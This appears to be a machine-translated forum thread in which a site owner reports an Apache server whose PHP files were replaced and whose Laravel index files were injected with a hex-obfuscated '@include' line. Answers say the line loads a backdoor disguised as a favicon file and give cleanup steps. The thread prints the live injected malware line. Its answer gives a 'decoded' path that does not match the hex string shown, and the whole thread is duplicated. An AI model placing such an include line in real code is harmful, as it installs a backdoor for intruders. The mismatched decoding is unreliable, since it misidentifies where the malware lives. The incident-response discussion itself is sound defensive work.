恶意软件 |我在 Apache 服务器上的 php 文件正在更改
malware | my php files on apache server is being changed
我的服务器出了问题。例如,我有一个静态 html 网站。用了几天。比链接坏了。我检查了 ftp 并看到 index.html 更改为 index.html.bak 并且有一个 index.php
这个奇怪的文件有一些加密代码。
比如这样:index.phphttps://hastebin.com/xepokigeqe.xml
还有这个:xml62.php https://hastebin.com/edohitogoc.xml
这个案例破坏了我的其他 php 网络应用程序。我的一些 laravel 应用程序索引文件被注入了这些行
/*47f70*/
@include "\x2fh\x6fm\x65/\x757\x335\x362\x336\x2f1\x37n\x61p\x6fl\x69p\x69z\x7aa\x2ec\x6fm\x2fa\x73s\x65t\x73/\x69m\x61g\x65s\x2fa\x76a\x74a\x72s\x2ff\x61v\x69c\x6fn\x5f0\x344\x624\x65.\x69c\x6f";
/*47f70*/
我不知道如何解决或如何研究这个东西。如果有人知道这件事,请帮助我。我会很高兴的。谢谢
如果可能,您应该删除所有文件并用代码的干净版本(未妥协的)替换它们。
在此之后,为了调查违规行为,您应该:
- 更改您的 ftp 密码并检查您的 ftp 访问日志
- 检查您的网络服务器日志中是否有奇怪的条目(远程 php 执行)
- 检查你的 mysql 日志文件是否有奇怪的查询(mysql 注入)
编码的字符串转换为
/home/u7356236/bebekti.com/script/revslider/favicon_45717f.ico
这很可能是一些伪装成网站图标的后门。
解密为
@include "/home/u7356236/bebekti.com/script/revslider/favicon_45717f.ico";
恶意软件是:http://bebekti.com/script/revslider/favicon_45717f.ico
它是一个伪装成图标文件的 php 文件,它解密为:https://hastebin.com/racohopene.xml
我会更改您的所有密码并确保它是安全的。
我的服务器出了问题。例如,我有一个静态 html 网站。用了几天。比链接坏了。我检查了 ftp 并看到 index.html 更改为 index.html.bak 并且有一个 index.php
这个奇怪的文件有一些加密代码。 比如这样:index.phphttps://hastebin.com/xepokigeqe.xml
还有这个:xml62.php https://hastebin.com/edohitogoc.xml
这个案例破坏了我的其他 php 网络应用程序。我的一些 laravel 应用程序索引文件被注入了这些行
/*47f70*/
@include "\x2fh\x6fm\x65/\x757\x335\x362\x336\x2f1\x37n\x61p\x6fl\x69p\x69z\x7aa\x2ec\x6fm\x2fa\x73s\x65t\x73/\x69m\x61g\x65s\x2fa\x76a\x74a\x72s\x2ff\x61v\x69c\x6fn\x5f0\x344\x624\x65.\x69c\x6f";
/*47f70*/
我不知道如何解决或如何研究这个东西。如果有人知道这件事,请帮助我。我会很高兴的。谢谢
如果可能,您应该删除所有文件并用代码的干净版本(未妥协的)替换它们。
在此之后,为了调查违规行为,您应该:
- 更改您的 ftp 密码并检查您的 ftp 访问日志
- 检查您的网络服务器日志中是否有奇怪的条目(远程 php 执行)
- 检查你的 mysql 日志文件是否有奇怪的查询(mysql 注入)
编码的字符串转换为
/home/u7356236/bebekti.com/script/revslider/favicon_45717f.ico
这很可能是一些伪装成网站图标的后门。
解密为 @include "/home/u7356236/bebekti.com/script/revslider/favicon_45717f.ico";
恶意软件是:http://bebekti.com/script/revslider/favicon_45717f.ico
它是一个伪装成图标文件的 php 文件,它解密为:https://hastebin.com/racohopene.xml
我会更改您的所有密码并确保它是安全的。